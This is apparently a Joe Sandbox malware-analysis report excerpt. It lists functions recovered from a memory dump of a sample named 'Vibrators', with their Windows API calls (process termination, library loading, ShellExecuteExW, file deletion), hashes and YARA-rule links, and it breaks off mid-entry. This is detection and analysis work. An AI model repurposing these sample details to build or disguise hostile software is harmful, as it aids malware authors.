Instruction ID: 540ee941d78149838a1734103bfe3eb4da684cb78ffdf68617eef8ffca7090f5
Opcode Fuzzy Hash: b00c933d5b2555133baacf3b1236f83ebd317183a5c7d984868e31c12156e415
Instruction Fuzzy Hash: DBF0F43754053036CE22777CBE06B5A136A9FC2B70B210638F924922D2EF288E134261

Function 00A89480 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 009F1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 009F1F87
Part of subcall function 009F1F2D: SelectObject.GDI32(?,00000000), ref: 009F1F96
Part of subcall function 009F1F2D: BeginPath.GDI32(?), ref: 009F1FAD
Part of subcall function 009F1F2D: SelectObject.GDI32(?,00000000), ref: 009F1FD6

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00A894AA
LineTo.GDI32(?,00000003,00000000), ref: 00A894BE
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00A894CC
LineTo.GDI32(?,00000000,00000003), ref: 00A894DC
EndPath.GDI32(?), ref: 00A894EC
StrokePath.GDI32(?), ref: 00A894FC

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 254fdb90e8a81202a345cb03fcdf56f4667aad4dde4575e72bf3c9d9cd1dfc70
Instruction ID: e2a81f7c31131596a1c2dd18443ecc7bc4c541f82b4dca0ba413aac2a2a46dbe
Opcode Fuzzy Hash: 254fdb90e8a81202a345cb03fcdf56f4667aad4dde4575e72bf3c9d9cd1dfc70
Instruction Fuzzy Hash: 9211DB7600014DBFDF12AF90EC89FAA7F6DEF08364F048011BA1A5A1A1C7719D56DBA0

Function 00A55B61 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00A55B7C
GetDeviceCaps.GDI32(00000000,00000058), ref: 00A55B8D
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A55B94
ReleaseDC.USER32(00000000,00000000), ref: 00A55B9C
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00A55BB3
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00A55BC5

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 532918bfefc3644c2705902f9aa36249f422e448699f4861ac43f7ffd2caef51
Instruction ID: e2314c89a67a3df9973cdc5cdce90b4facf2f5e2495d72e13d336173e374409b
Opcode Fuzzy Hash: 532918bfefc3644c2705902f9aa36249f422e448699f4861ac43f7ffd2caef51
Instruction Fuzzy Hash: 99014F75E00719BBEB109BF59C49E4EBFB8EF49751F004065FA09A7281E6709C05CBA0

Function 009F327E Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 009F32AF
MapVirtualKeyW.USER32(00000010,00000000), ref: 009F32B7
MapVirtualKeyW.USER32(000000A0,00000000), ref: 009F32C2
MapVirtualKeyW.USER32(000000A1,00000000), ref: 009F32CD
MapVirtualKeyW.USER32(00000011,00000000), ref: 009F32D5
MapVirtualKeyW.USER32(00000012,00000000), ref: 009F32DD

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 25e6ed9b058d44e4cf89443a2cba4c7cb63ad61a47ff2ac8e4138d9e9e03d5b7
Instruction ID: 85a148a8a223555da70471829362e015e4758d688e0c329cb5455fbdcd720ed1
Opcode Fuzzy Hash: 25e6ed9b058d44e4cf89443a2cba4c7cb63ad61a47ff2ac8e4138d9e9e03d5b7
Instruction Fuzzy Hash: 70016CB09017597DE3008F5A8C85B52FFA8FF19354F00411B915C47941C7F5A864CBE5

Function 00A5F437 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00A5F447
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00A5F45D
GetWindowThreadProcessId.USER32(?,?), ref: 00A5F46C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A5F47B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A5F485
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A5F48C

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: c55736d7b8765c751fd458a6085017d9ff957c378bda55866c5c7362e84977f6
Instruction ID: 28e5dd219b74559dcd8350e5f8e8329d0f3cb5588b6d6d31e124c96610ab2dbd
Opcode Fuzzy Hash: c55736d7b8765c751fd458a6085017d9ff957c378bda55866c5c7362e84977f6
Instruction Fuzzy Hash: 8EF03072241158BBE72197929C0EEEF3B7CEFC6B11F000168F601910D0E7A45A42D7B5

Function 00A334D6 Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00A334EF
SendMessageW.USER32(?,00001328,00000000,?), ref: 00A33506
GetWindowDC.USER32(?), ref: 00A33512
GetPixel.GDI32(00000000,?,?), ref: 00A33521
ReleaseDC.USER32(?,00000000), ref: 00A33533
GetSysColor.USER32(00000005), ref: 00A3354D

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 475baa5aa5cbe47ca58ac6c283bb9eeae244aa73ef8c7a4a8b937d0b67694423
Instruction ID: 7a93f484b33ac55feb378af97f6b9f7d8eae65fb9c0540659ffb90e7f50b4c40
Opcode Fuzzy Hash: 475baa5aa5cbe47ca58ac6c283bb9eeae244aa73ef8c7a4a8b937d0b67694423
Instruction Fuzzy Hash: F7012832544109EFDB509FA4DC08FE97BB2FF04321F510561FA1AA21E0CB321E52AB10

Function 00A521C1 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A521CC
UnloadUserProfile.USERENV(?,?), ref: 00A521D8
CloseHandle.KERNEL32(?), ref: 00A521E1
CloseHandle.KERNEL32(?), ref: 00A521E9
GetProcessHeap.KERNEL32(00000000,?), ref: 00A521F2
HeapFree.KERNEL32(00000000), ref: 00A521F9

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 5815040e09a51b32b3e4f7db4d0402da73f3d63f03db1280c4ee8c5976a56d1f
Instruction ID: 9222da3fe7e1e03e13bd45f8c7271523496fc57d99a70640e48b6f8883088fa0
Opcode Fuzzy Hash: 5815040e09a51b32b3e4f7db4d0402da73f3d63f03db1280c4ee8c5976a56d1f
Instruction Fuzzy Hash: 6BE0E576004105BBDB01AFE1EC0CD0ABF39FF49322B104220F225860B4CB329422EB50

Function 00A5CE7B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 009F41EA: _wcslen.LIBCMT ref: 009F41EF

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A5CF99
_wcslen.LIBCMT ref: 00A5CFE0
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A5D047
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00A5D075

Strings

0, xrefs: 00A5CF5A

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 2671f260f9249c5d4549806b1a9f72251796c3ec0e13e403b259021de5b14ea7
Instruction ID: 353ddd8d95a78f09db976db5e5dbafefe9b1259e384978896b23fbeb588730d2
Opcode Fuzzy Hash: 2671f260f9249c5d4549806b1a9f72251796c3ec0e13e403b259021de5b14ea7
Instruction Fuzzy Hash: 5C51BD71604300AFD724AF28C945BABBBE8BB85366F040A2DFD96D71D1DBB0CD498752

Function 00A7B7C4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 00A7B903

Part of subcall function 009F41EA: _wcslen.LIBCMT ref: 009F41EF

GetProcessId.KERNEL32(00000000), ref: 00A7B998
CloseHandle.KERNEL32(00000000), ref: 00A7B9C7

Strings

<, xrefs: 00A7B8CB
@, xrefs: 00A7B8D2

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: cb305d3eff5f696dcaae5b0d77c8b652ed502d1ce963699baed8371f0f0ef8d4
Instruction ID: 52b56d57bbfcd8e37493b762e85339f0fec6b7900c1c04d0cd763cb86dddd9c1
Opcode Fuzzy Hash: cb305d3eff5f696dcaae5b0d77c8b652ed502d1ce963699baed8371f0f0ef8d4
Instruction Fuzzy Hash: 51714975A10219DFCB10EF54C894A9EBBB5EF08310F04C499E969AB291CB74ED41CBA1

Function 00A57B05 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00A57B6D
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00A57BA3
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00A57BB4
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00A57C36

Strings

DllGetClassObject, xrefs: 00A57BA9

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: cfd8918b506b939490c99c507c7b6cd319b43bea271263ac4cf0c31e3c8cc00a
Instruction ID: a79b21c1728b1f373b9451b181750f0e20f3d85239ca03c9a7b405bc05350261
Opcode Fuzzy Hash: cfd8918b506b939490c99c507c7b6cd319b43bea271263ac4cf0c31e3c8cc00a
Instruction Fuzzy Hash: C541A2B1604204EFDB15DF64E884A9E7BB9FF44312F1480A9ED05AF246D7B0DD48CBA0

Function 00A84818 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A848D1
IsMenu.USER32(?), ref: 00A848E6
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00A8492E
DrawMenuBar.USER32 ref: 00A84941

Strings

0, xrefs: 00A84825

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: aae4bb311c61e73387b976085ccc664d2a5f58a63373e33e2785d54fb5b2774f
Instruction ID: 04f18675c4f47d36a47381462e11aab720e48886c75eeaf165edde017367efbb
Opcode Fuzzy Hash: aae4bb311c61e73387b976085ccc664d2a5f58a63373e33e2785d54fb5b2774f
Instruction Fuzzy Hash: EC415B75A0020AEFDF20EFA1D884EAABBB9FF19324F044129E95597250D730ED55CBA0

Function 00A5272F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 009FB329: _wcslen.LIBCMT ref: 009FB333

Part of subcall function 00A545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00A54620

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00A527B3
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00A527C6
SendMessageW.USER32(?,00000189,?,00000000), ref: 00A527F6

Part of subcall function 009F8577: _wcslen.LIBCMT ref: 009F858A

Strings

ComboBox, xrefs: 00A5273D
ListBox, xrefs: 00A52772

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: 2f22380cc7d24bf2949a3b4e364a70216650c3ca840722ac930748a3fc62be04
Instruction ID: 8624ca3b4f6a3f99a3e75f5cf794f9fd6bd82317966ea835ce717b221931995e
Opcode Fuzzy Hash: 2f22380cc7d24bf2949a3b4e364a70216650c3ca840722ac930748a3fc62be04
Instruction Fuzzy Hash: 0121F371940108BFDB09ABA0D846EFFBB78EF86360F104129F921A71E1DB78494A9760

Function 00A839B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00A83A29
LoadLibraryW.KERNEL32(?), ref: 00A83A30
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00A83A45
DestroyWindow.USER32(?), ref: 00A83A4D

Strings

SysAnimate32, xrefs: 00A83A04

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 13e3ab3ce95a060a26e6c015737378dbf5fe4c9ae562381315399d31132d08d5
Instruction ID: 481552225a104bc393c41178547cc4a608457683cc8111d642d100db15a5afd9
Opcode Fuzzy Hash: 13e3ab3ce95a060a26e6c015737378dbf5fe4c9ae562381315399d31132d08d5
Instruction Fuzzy Hash: 4221C0B2600209AFEF14AFA4DC90FBBB7ADEF44BA4F105618FA91961D0D772CD419760

Function 00A150DD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00A1508E,?,?,00A1502E,?,00AB98D8,0000000C,00A15185,?,00000002), ref: 00A150FD
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A15110
FreeLibrary.KERNEL32(00000000,?,?,?,00A1508E,?,?,00A1502E,?,00AB98D8,0000000C,00A15185,?,00000002,00000000), ref: 00A15133

Strings

CorExitProcess, xrefs: 00A15108
mscoree.dll, xrefs: 00A150F6

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 00053fab1f13b74335133d9f504535003f54864ea6b7cdcee8a47fdd2e2c0e11
Instruction ID: a391e5b791f0560c5c999adb08d125ebe7e52bb69821afdc1de2062a46e2780e
Opcode Fuzzy Hash: 00053fab1f13b74335133d9f504535003f54864ea6b7cdcee8a47fdd2e2c0e11
Instruction Fuzzy Hash: 5AF04431A00209BBDB11AFE4DC49BDDBBB9EF44752F400164F805A61A0DB745981DB94

Function 00A4E778 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00A4E785
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00A4E797
FreeLibrary.KERNEL32(00000000), ref: 00A4E7BD

Strings

GetSystemWow64DirectoryW, xrefs: 00A4E791
X64, xrefs: 00A4E680

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 145871493-2590602151
Opcode ID: 10176ac9fbf1d27cd2be4c07c0eb94a1bce5141b5ffc6a3acfcf874be14bf93e
Instruction ID: 9d1058a82906f87ffdf4d78a612fca7637a19f8806e64ce1d97492faac423c53
Opcode Fuzzy Hash: 10176ac9fbf1d27cd2be4c07c0eb94a1bce5141b5ffc6a3acfcf874be14bf93e
Instruction Fuzzy Hash: C7E09279816621AFE771DB609C88FAAB3287F60B41F120A58FC42F6191DB70CD55C794

Function 009F6607 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00A35657,?,?,009F62FA,?,00000001,?,?,00000000), ref: 009F6610
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 009F6622
FreeLibrary.KERNEL32(00000000,?,?,00A35657,?,?,009F62FA,?,00000001,?,?,00000000), ref: 009F6635

Strings

Wow64RevertWow64FsRedirection, xrefs: 009F661C
kernel32.dll, xrefs: 009F6609

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 90aefadac914e76f8c763850efb938385c83179c1588a037013a28ce6e15934b
Instruction ID: 61a370b87ad47a81f6a5afdd63d95b8895c4a92c975112e0a6537ed681f2f0e0
Opcode Fuzzy Hash: 90aefadac914e76f8c763850efb938385c83179c1588a037013a28ce6e15934b
Instruction Fuzzy Hash: 2ED01235612A3977523267657C1DA9E6B18AE96F213450619F900E6294CF60CD0287A8

Function 00A63306 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A635C4
DeleteFileW.KERNEL32(?), ref: 00A63646
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00A6365C
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A6366D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A6367F

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: e6d810c83055aae3d81a58ee3316544e8d2f4573bb0987594dad6edae1971b2e
